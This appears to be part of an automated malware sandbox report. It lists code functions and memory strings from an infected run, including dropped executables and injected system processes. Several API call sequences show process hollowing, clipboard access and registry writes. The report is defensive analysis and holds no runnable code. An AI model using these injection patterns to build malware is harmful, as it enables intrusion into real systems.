                    Source: explorer.exe, 00000007.00000002.2539158151.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1285013932.0000000006F94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/california-s-reservoirs-runneth-over-in-astounding-reve
                    Source: explorer.exe, 00000007.00000002.2539158151.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1285013932.0000000006F94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
                    Source: C:\Windows\explorer.exeCode function: 7_2_0DF37960 OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,7_2_0DF37960
                    Source: C:\Windows\explorer.exeCode function: 7_2_0DF37B50 GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,7_2_0DF37B50
                    Source: C:\Windows\explorer.exeCode function: 7_2_0E0E7B50 GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,7_2_0E0E7B50
                    Source: C:\Windows\explorer.exeCode function: 7_2_10207B50 GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,7_2_10207B50
                    Source: C:\Windows\explorer.exeCode function: 7_2_0DF37960 OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,7_2_0DF37960
                    Source: C:\Users\user\Desktop\m5804Te9Uw.exeCode function: 3_2_00007FF7F73E24D4 GetModuleFileNameW,CreateProcessW,CreateFileW,GetFileSize,CloseHandle,VirtualAlloc,CloseHandle,ReadFile,VirtualFree,CloseHandle,CloseHandle,GetThreadContext,VirtualFree,ReadProcessMemory,GetModuleHandleA,GetProcAddress,NtUnmapViewOfSection,VirtualFree,VirtualAllocEx,VirtualFree,WriteProcessMemory,VirtualFree,WriteProcessMemory,VirtualFree,RtlCompareMemory,ReadProcessMemory,WriteProcessMemory,VirtualFree,WriteProcessMemory,SetThreadContext,VirtualFree,ResumeThread,VirtualFree,VirtualFree,3_2_00007FF7F73E24D4
                    Source: C:\Windows\explorer.exeCode function: 7_2_0DF60C90 memset,NtSetValueKey,7_2_0DF60C90
                    Source: C:\Windows\explorer.exeCode function: 7_2_0DF60C98 Sleep,NtSetValueKey,7_2_0DF60C98
                    Source: C:\Windows\explorer.exeCode function: 7_2_0DF4F438 RtlCaptureContext,NtQueryInformationProcess,7_2_0DF4F438
                    Source: C:\Windows\explorer.exeCode function: 7_2_0DF4F438 RtlCaptureContext,NtQueryInformationProcess,7_2_0DF4F438
                    Source: C:\Windows\explorer.exeCode function: 7_2_0DF21370 CreateFileA,GetFileSize,malloc,ReadFile,CloseHandle,CreateProcessA,GetThreadContext,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,NtQueryInformationProcess,WriteProcessMemory,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,free,7_2_0DF21370
                    Source: C:\Windows\explorer.exeCode function: 7_2_0E0FF438 RtlCaptureContext,NtQueryInformationProcess,7_2_0E0FF438
                    Source: C:\Windows\explorer.exeCode function: 7_2_0E0FF438 RtlCaptureContext,NtQueryInformationProcess,7_2_0E0FF438
                    Source: C:\Windows\explorer.exeCode function: 7_2_0E110C90 memset,NtSetValueKey,7_2_0E110C90
                    Source: C:\Windows\explorer.exeCode function: 7_2_0E110C98 Sleep,NtSetValueKey,7_2_0E110C98
                    Source: C:\Windows\explorer.exeCode function: 7_2_0E0D1370 CreateFileA,GetFileSize,malloc,ReadFile,CloseHandle,CreateProcessA,GetThreadContext,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,NtQueryInformationProcess,WriteProcessMemory,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,free,7_2_0E0D1370
                    Source: C:\Windows\explorer.exeCode function: 7_2_101F1370 CreateFileA,GetFileSize,malloc,ReadFile,CloseHandle,CreateProcessA,GetThreadContext,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,NtQueryInformationProcess,WriteProcessMemory,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,free,7_2_101F1370
                    Source: C:\Windows\explorer.exeCode function: 7_2_1021F438 RtlCaptureContext,NtQueryInformationProcess,7_2_1021F438
                    Source: C:\Windows\explorer.exeCode function: 7_2_1021F438 RtlCaptureContext,NtQueryInformationProcess,7_2_1021F438
                    Source: C:\Windows\explorer.exeCode function: 7_2_10230C90 memset,NtSetValueKey,7_2_10230C90
                    Source: C:\Windows\explorer.exeCode function: 7_2_10230C98 Sleep,NtSetValueKey,7_2_10230C98
                    Source: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeCode function: 10_2_00007FF72A0224D4 GetModuleFileNameW,CreateProcessW,CreateFileW,GetFileSize,CloseHandle,VirtualAlloc,CloseHandle,ReadFile,VirtualFree,CloseHandle,CloseHandle,GetThreadContext,VirtualFree,ReadProcessMemory,GetModuleHandleA,GetProcAddress,NtUnmapViewOfSection,VirtualFree,VirtualAllocEx,VirtualFree,WriteProcessMemory,VirtualFree,WriteProcessMemory,VirtualFree,RtlCompareMemory,ReadProcessMemory,WriteProcessMemory,VirtualFree,WriteProcessMemory,SetThreadContext,VirtualFree,ResumeThread,VirtualFree,VirtualFree,10_2_00007FF72A0224D4
                    Source: C:\Users\user\Desktop\m5804Te9Uw.exeCode function: 3_2_00007FF7F73E34143_2_00007FF7F73E3414
                    Source: C:\Users\user\Desktop\m5804Te9Uw.exeCode function: 3_2_00007FF7F73E24D43_2_00007FF7F73E24D4
                    Source: C:\Windows\System32\svchost.exeCode function: 4_2_00007FF7DF2234144_2_00007FF7DF223414
                    Source: C:\Windows\System32\svchost.exeCode function: 4_2_00007FF7DF2224D44_2_00007FF7DF2224D4
                    Source: C:\Windows\explorer.exeCode function: 7_2_0DF217F07_2_0DF217F0
                    Source: C:\Windows\explorer.exeCode function: 7_2_0DF270707_2_0DF27070
                    Source: C:\Windows\explorer.exeCode function: 7_2_0DF350707_2_0DF35070
                    Source: C:\Windows\explorer.exeCode function: 7_2_0DF425B47_2_0DF425B4
                    Source: C:\Windows\explorer.exeCode function: 7_2_0DF3FD887_2_0DF3FD88
                    Source: C:\Windows\explorer.exeCode function: 7_2_0DF4AD747_2_0DF4AD74
                    Source: C:\Windows\explorer.exeCode function: 7_2_0DF334C77_2_0DF334C7
                    Source: C:\Windows\explorer.exeCode function: 7_2_0DF4D45C7_2_0DF4D45C
                    Source: C:\Windows\explorer.exeCode function: 7_2_0DF497D47_2_0DF497D4
                    Source: C:\Windows\explorer.exeCode function: 7_2_0DF4B7A47_2_0DF4B7A4
                    Source: C:\Windows\explorer.exeCode function: 7_2_0DF4DF027_2_0DF4DF02
                    Source: C:\Windows\explorer.exeCode function: 7_2_0DF479D47_2_0DF479D4
                    Source: C:\Windows\explorer.exeCode function: 7_2_0DF429647_2_0DF42964
                    Source: C:\Windows\explorer.exeCode function: 7_2_0DF3D9647_2_0DF3D964
                    Source: C:\Windows\explorer.exeCode function: 7_2_0DF400207_2_0DF40020
                    Source: C:\Windows\explorer.exeCode function: 7_2_0DF4A0287_2_0DF4A028
                    Source: C:\Windows\explorer.exeCode function: 7_2_0DF473B07_2_0DF473B0
                    Source: C:\Windows\explorer.exeCode function: 7_2_0DF27BA37_2_0DF27BA3
                    Source: C:\Windows\explorer.exeCode function: 7_2_0DF27BAD7_2_0DF27BAD
                    Source: C:\Windows\explorer.exeCode function: 7_2_0DF27B917_2_0DF27B91
                    Source: C:\Windows\explorer.exeCode function: 7_2_0DF27B9B7_2_0DF27B9B
                    Source: C:\Windows\explorer.exeCode function: 7_2_0DF27B877_2_0DF27B87
                    Source: C:\Windows\explorer.exeCode function: 7_2_0DF27B7D7_2_0DF27B7D
                    Source: C:\Windows\explorer.exeCode function: 7_2_0DF27AF07_2_0DF27AF0
                    Source: C:\Windows\explorer.exeCode function: 7_2_0E0FDF027_2_0E0FDF02
                    Source: C:\Windows\explorer.exeCode function: 7_2_0E0FB7A47_2_0E0FB7A4
                    Source: C:\Windows\explorer.exeCode function: 7_2_0E0F97D47_2_0E0F97D4
                    Source: C:\Windows\explorer.exeCode function: 7_2_0E0D17F07_2_0E0D17F0
                    Source: C:\Windows\explorer.exeCode function: 7_2_0E0FD45C7_2_0E0FD45C
                    Source: C:\Windows\explorer.exeCode function: 7_2_0E0E34C77_2_0E0E34C7
                    Source: C:\Windows\explorer.exeCode function: 7_2_0E0FAD747_2_0E0FAD74
                    Source: C:\Windows\explorer.exeCode function: 7_2_0E0EFD887_2_0E0EFD88
                    Source: C:\Windows\explorer.exeCode function: 7_2_0E0F25B47_2_0E0F25B4
                    Source: C:\Windows\explorer.exeCode function: 7_2_0E0D7AF07_2_0E0D7AF0
                    Source: C:\Windows\explorer.exeCode function: 7_2_0E0D7B7D7_2_0E0D7B7D
                    Source: C:\Windows\explorer.exeCode function: 7_2_0E0D7B877_2_0E0D7B87
                    Source: C:\Windows\explorer.exeCode function: 7_2_0E0D7B9B7_2_0E0D7B9B
                    Source: C:\Windows\explorer.exeCode function: 7_2_0E0D7B917_2_0E0D7B91
                    Source: C:\Windows\explorer.exeCode function: 7_2_0E0D7BAD7_2_0E0D7BAD
                    Source: C:\Windows\explorer.exeCode function: 7_2_0E0D7BA37_2_0E0D7BA3
                    Source: C:\Windows\explorer.exeCode function: 7_2_0E0F73B07_2_0E0F73B0
                    Source: C:\Windows\explorer.exeCode function: 7_2_0E0FA0287_2_0E0FA028
                    Source: C:\Windows\explorer.exeCode function: 7_2_0E0F00207_2_0E0F0020
                    Source: C:\Windows\explorer.exeCode function: 7_2_0E0D70707_2_0E0D7070
                    Source: C:\Windows\explorer.exeCode function: 7_2_0E0E50707_2_0E0E5070
                    Source: C:\Windows\explorer.exeCode function: 7_2_0E0ED9647_2_0E0ED964
                    Source: C:\Windows\explorer.exeCode function: 7_2_0E0F29647_2_0E0F2964
                    Source: C:\Windows\explorer.exeCode function: 7_2_0E0F79D47_2_0E0F79D4
                    Source: C:\Windows\explorer.exeCode function: 7_2_102100207_2_10210020
                    Source: C:\Windows\explorer.exeCode function: 7_2_1021A0287_2_1021A028
                    Source: C:\Windows\explorer.exeCode function: 7_2_102050707_2_10205070
                    Source: C:\Windows\explorer.exeCode function: 7_2_101F70707_2_101F7070
                    Source: C:\Windows\explorer.exeCode function: 7_2_1020D9647_2_1020D964
                    Source: C:\Windows\explorer.exeCode function: 7_2_102129647_2_10212964
                    Source: C:\Windows\explorer.exeCode function: 7_2_102179D47_2_102179D4
                    Source: C:\Windows\explorer.exeCode function: 7_2_101F7AF07_2_101F7AF0
                    Source: C:\Windows\explorer.exeCode function: 7_2_101F7B7D7_2_101F7B7D
                    Source: C:\Windows\explorer.exeCode function: 7_2_101F7B9B7_2_101F7B9B
                    Source: C:\Windows\explorer.exeCode function: 7_2_101F7B917_2_101F7B91
                    Source: C:\Windows\explorer.exeCode function: 7_2_102173B07_2_102173B0
                    Source: C:\Windows\explorer.exeCode function: 7_2_101F7B877_2_101F7B87
                    Source: C:\Windows\explorer.exeCode function: 7_2_101F7BAD7_2_101F7BAD
                    Source: C:\Windows\explorer.exeCode function: 7_2_101F7BA37_2_101F7BA3
                    Source: C:\Windows\explorer.exeCode function: 7_2_1021D45C7_2_1021D45C
                    Source: C:\Windows\explorer.exeCode function: 7_2_102034C77_2_102034C7
                    Source: C:\Windows\explorer.exeCode function: 7_2_1021AD747_2_1021AD74
                    Source: C:\Windows\explorer.exeCode function: 7_2_102125B47_2_102125B4
                    Source: C:\Windows\explorer.exeCode function: 7_2_1020FD887_2_1020FD88
                    Source: C:\Windows\explorer.exeCode function: 7_2_1021DF027_2_1021DF02
                    Source: C:\Windows\explorer.exeCode function: 7_2_1021B7A47_2_1021B7A4
                    Source: C:\Windows\explorer.exeCode function: 7_2_101F17F07_2_101F17F0
                    Source: C:\Windows\explorer.exeCode function: 7_2_102197D47_2_102197D4
                    Source: C:\Windows\explorer.exeCode function: 7_2_08A2B0D97_2_08A2B0D9
                    Source: C:\Windows\explorer.exeCode function: 7_2_08A069A57_2_08A069A5
                    Source: C:\Windows\explorer.exeCode function: 7_2_08A011257_2_08A01125
                    Source: C:\Windows\explorer.exeCode function: 7_2_08A1F9557_2_08A1F955
                    Source: C:\Windows\explorer.exeCode function: 7_2_08A1D2997_2_08A1D299
                    Source: C:\Windows\explorer.exeCode function: 7_2_08A222997_2_08A22299
                    Source: C:\Windows\explorer.exeCode function: 7_2_08A074AE7_2_08A074AE
                    Source: C:\Windows\explorer.exeCode function: 7_2_08A074B87_2_08A074B8
                    Source: C:\Windows\explorer.exeCode function: 7_2_08A074E07_2_08A074E0
                    Source: C:\Windows\explorer.exeCode function: 7_2_08A26CE57_2_08A26CE5
                    Source: C:\Windows\explorer.exeCode function: 7_2_08A074C27_2_08A074C2
                    Source: C:\Windows\explorer.exeCode function: 7_2_08A074CC7_2_08A074CC
                    Source: C:\Windows\explorer.exeCode function: 7_2_08A074D67_2_08A074D6
                    Source: C:\Windows\explorer.exeCode function: 7_2_08A074257_2_08A07425
                    Source: C:\Windows\explorer.exeCode function: 7_2_08A12DFC7_2_08A12DFC
                    Source: C:\Windows\explorer.exeCode function: 7_2_08A2A6A97_2_08A2A6A9
                    Source: C:\Windows\explorer.exeCode function: 7_2_08A1F6BD7_2_08A1F6BD
                    Source: C:\Windows\explorer.exeCode function: 7_2_0AE522997_2_0AE52299
                    Source: C:\Windows\explorer.exeCode function: 7_2_0AE4D2997_2_0AE4D299
                    Source: C:\Windows\explorer.exeCode function: 7_2_0AE5B0D97_2_0AE5B0D9
                    Source: C:\Windows\explorer.exeCode function: 7_2_0AE369A57_2_0AE369A5
                    Source: C:\Windows\explorer.exeCode function: 7_2_0AE4F9557_2_0AE4F955
                    Source: C:\Windows\explorer.exeCode function: 7_2_0AE311257_2_0AE31125
                    Source: C:\Windows\explorer.exeCode function: 7_2_0AE5A6A97_2_0AE5A6A9
                    Source: C:\Windows\explorer.exeCode function: 7_2_0AE4F6BD7_2_0AE4F6BD
                    Source: C:\Windows\explorer.exeCode function: 7_2_0AE56CE57_2_0AE56CE5
                    Source: C:\Windows\explorer.exeCode function: 7_2_0AE374E07_2_0AE374E0
                    Source: C:\Windows\explorer.exeCode function: 7_2_0AE374C27_2_0AE374C2
                    Source: C:\Windows\explorer.exeCode function: 7_2_0AE374CC7_2_0AE374CC
                    Source: C:\Windows\explorer.exeCode function: 7_2_0AE374D67_2_0AE374D6
                    Source: C:\Windows\explorer.exeCode function: 7_2_0AE374AE7_2_0AE374AE
                    Source: C:\Windows\explorer.exeCode function: 7_2_0AE374B87_2_0AE374B8
                    Source: C:\Windows\explorer.exeCode function: 7_2_0AE374257_2_0AE37425
                    Source: C:\Windows\explorer.exeCode function: 7_2_0AE42DFC7_2_0AE42DFC
                    Source: C:\Windows\explorer.exeCode function: 7_2_0B3122997_2_0B312299
                    Source: C:\Windows\explorer.exeCode function: 7_2_0B30D2997_2_0B30D299
                    Source: C:\Windows\explorer.exeCode function: 7_2_0B2F11257_2_0B2F1125
                    Source: C:\Windows\explorer.exeCode function: 7_2_0B30F9557_2_0B30F955
                    Source: C:\Windows\explorer.exeCode function: 7_2_0B2F69A57_2_0B2F69A5
                    Source: C:\Windows\explorer.exeCode function: 7_2_0B31B0D97_2_0B31B0D9
                    Source: C:\Windows\explorer.exeCode function: 7_2_0B30F6BD7_2_0B30F6BD
                    Source: C:\Windows\explorer.exeCode function: 7_2_0B31A6A97_2_0B31A6A9
                    Source: C:\Windows\explorer.exeCode function: 7_2_0B302DFC7_2_0B302DFC
                    Source: C:\Windows\explorer.exeCode function: 7_2_0B2F74257_2_0B2F7425
                    Source: C:\Windows\explorer.exeCode function: 7_2_0B2F74AE7_2_0B2F74AE
                    Source: C:\Windows\explorer.exeCode function: 7_2_0B2F74B87_2_0B2F74B8
                    Source: C:\Windows\explorer.exeCode function: 7_2_0B2F74E07_2_0B2F74E0
                    Source: C:\Windows\explorer.exeCode function: 7_2_0B316CE57_2_0B316CE5
                    Source: C:\Windows\explorer.exeCode function: 7_2_0B2F74CC7_2_0B2F74CC
                    Source: C:\Windows\explorer.exeCode function: 7_2_0B2F74C27_2_0B2F74C2
                    Source: C:\Windows\explorer.exeCode function: 7_2_0B2F74D67_2_0B2F74D6
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeCode function: 9_2_00D0DC749_2_00D0DC74
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeCode function: 9_2_0699E4C89_2_0699E4C8
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeCode function: 9_2_069915E89_2_069915E8
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeCode function: 9_2_069922989_2_06992298
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeCode function: 9_2_069900409_2_06990040
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeCode function: 9_2_069951F89_2_069951F8
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeCode function: 9_2_069941E89_2_069941E8
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeCode function: 9_2_06999EF89_2_06999EF8
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeCode function: 9_2_0699D9E89_2_0699D9E8
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeCode function: 9_2_0699158E9_2_0699158E
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeCode function: 9_2_069915D89_2_069915D8
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeCode function: 9_2_06B636B89_2_06B636B8
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeCode function: 9_2_06B600409_2_06B60040
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeCode function: 9_2_06B6D8689_2_06B6D868
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeCode function: 9_2_06B6D8589_2_06B6D858
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeCode function: 9_2_085B16289_2_085B1628
                    Source: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeCode function: 10_2_00007FF72A0224D410_2_00007FF72A0224D4
                    Source: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeCode function: 10_2_00007FF72A02341410_2_00007FF72A023414
                    Source: C:\Windows\System32\audiodg.exeCode function: 12_2_00007FF6DAB8341412_2_00007FF6DAB83414
                    Source: C:\Windows\System32\audiodg.exeCode function: 12_2_00007FF6DAB824D412_2_00007FF6DAB824D4
                    Source: C:\Windows\System32\msiexec.exeCode function: 13_2_00007FF65D6F341413_2_00007FF65D6F3414
                    Source: C:\Windows\System32\msiexec.exeCode function: 13_2_00007FF65D6F24D413_2_00007FF65D6F24D4
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 15_2_00007FF79DAD100015_2_00007FF79DAD1000
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 15_2_00007FF79DAF5C7415_2_00007FF79DAF5C74
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 15_2_00007FF79DAEFBD815_2_00007FF79DAEFBD8
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 15_2_00007FF79DAF4F1015_2_00007FF79DAF4F10
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 15_2_00007FF79DAE0E7015_2_00007FF79DAE0E70
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 15_2_00007FF79DAD95FB15_2_00007FF79DAD95FB
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 15_2_00007FF79DAECD6C15_2_00007FF79DAECD6C
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 15_2_00007FF79DAE28C015_2_00007FF79DAE28C0
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 15_2_00007FF79DAE504015_2_00007FF79DAE5040
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 15_2_00007FF79DAED88015_2_00007FF79DAED880
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 15_2_00007FF79DAE107415_2_00007FF79DAE1074
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 15_2_00007FF79DAD9FCD15_2_00007FF79DAD9FCD
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 15_2_00007FF79DAD979B15_2_00007FF79DAD979B
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 15_2_00007FF79DAE1F3015_2_00007FF79DAE1F30
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 15_2_00007FF79DAEFBD815_2_00007FF79DAEFBD8
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 15_2_00007FF79DAF572815_2_00007FF79DAF5728
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 15_2_00007FF79DAF2F2015_2_00007FF79DAF2F20
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 15_2_00007FF79DAE7AAC15_2_00007FF79DAE7AAC
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 15_2_00007FF79DAF8A3815_2_00007FF79DAF8A38
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 15_2_00007FF79DAE128015_2_00007FF79DAE1280
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 15_2_00007FF79DAE0A6015_2_00007FF79DAE0A60
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 15_2_00007FF79DAE91B015_2_00007FF79DAE91B0
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 15_2_00007FF79DAED20015_2_00007FF79DAED200
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 15_2_00007FF79DAF518C15_2_00007FF79DAF518C
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 15_2_00007FF79DAE2CC415_2_00007FF79DAE2CC4
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 15_2_00007FF79DAE148415_2_00007FF79DAE1484
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 15_2_00007FF79DAE0C6415_2_00007FF79DAE0C64
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 15_2_00007FF79DAF33BC15_2_00007FF79DAF33BC
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 15_2_00007FF79DAE73F415_2_00007FF79DAE73F4
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 15_2_00007FF79DAD8B2015_2_00007FF79DAD8B20
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 15_2_00007FF79DAF0B8415_2_00007FF79DAF0B84
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 16_2_00007FF79DAF4F1016_2_00007FF79DAF4F10
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 16_2_00007FF79DAD100016_2_00007FF79DAD1000
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 16_2_00007FF79DAF5C7416_2_00007FF79DAF5C74
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 16_2_00007FF79DAE0E7016_2_00007FF79DAE0E70
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 16_2_00007FF79DAD95FB16_2_00007FF79DAD95FB
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 16_2_00007FF79DAECD6C16_2_00007FF79DAECD6C
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 16_2_00007FF79DAE28C016_2_00007FF79DAE28C0
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 16_2_00007FF79DAE504016_2_00007FF79DAE5040
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 16_2_00007FF79DAED88016_2_00007FF79DAED880
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 16_2_00007FF79DAE107416_2_00007FF79DAE1074
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 16_2_00007FF79DAD9FCD16_2_00007FF79DAD9FCD
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 16_2_00007FF79DAD979B16_2_00007FF79DAD979B
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 16_2_00007FF79DAE1F3016_2_00007FF79DAE1F30
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 16_2_00007FF79DAEFBD816_2_00007FF79DAEFBD8
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 16_2_00007FF79DAF572816_2_00007FF79DAF5728
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 16_2_00007FF79DAF2F2016_2_00007FF79DAF2F20
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 16_2_00007FF79DAE7AAC16_2_00007FF79DAE7AAC
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 16_2_00007FF79DAF8A3816_2_00007FF79DAF8A38
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 16_2_00007FF79DAE128016_2_00007FF79DAE1280
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 16_2_00007FF79DAE0A6016_2_00007FF79DAE0A60
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 16_2_00007FF79DAE91B016_2_00007FF79DAE91B0
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 16_2_00007FF79DAED20016_2_00007FF79DAED200
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 16_2_00007FF79DAF518C16_2_00007FF79DAF518C
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 16_2_00007FF79DAE2CC416_2_00007FF79DAE2CC4
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 16_2_00007FF79DAE148416_2_00007FF79DAE1484
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 16_2_00007FF79DAE0C6416_2_00007FF79DAE0C64
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 16_2_00007FF79DAF33BC16_2_00007FF79DAF33BC
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 16_2_00007FF79DAE73F416_2_00007FF79DAE73F4
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 16_2_00007FF79DAEFBD816_2_00007FF79DAEFBD8
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 16_2_00007FF79DAD8B2016_2_00007FF79DAD8B20
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 16_2_00007FF79DAF0B8416_2_00007FF79DAF0B84
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 16_2_00007FF821CD62D016_2_00007FF821CD62D0
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 16_2_00007FF821CB327416_2_00007FF821CB3274
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 16_2_00007FF821CD120016_2_00007FF821CD1200
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 16_2_00007FF821CCD12016_2_00007FF821CCD120
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 16_2_00007FF821CDC42916_2_00007FF821CDC429
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 16_2_00007FF821CD238416_2_00007FF821CD2384
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 16_2_00007FF821CB233C16_2_00007FF821CB233C
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 16_2_00007FF821CBC36016_2_00007FF821CBC360
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 16_2_00007FF821CB831016_2_00007FF821CB8310
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 16_2_00007FF821CC030016_2_00007FF821CC0300
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 16_2_00007FF821CC16D016_2_00007FF821CC16D0
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 16_2_00007FF821CCF5A416_2_00007FF821CCF5A4
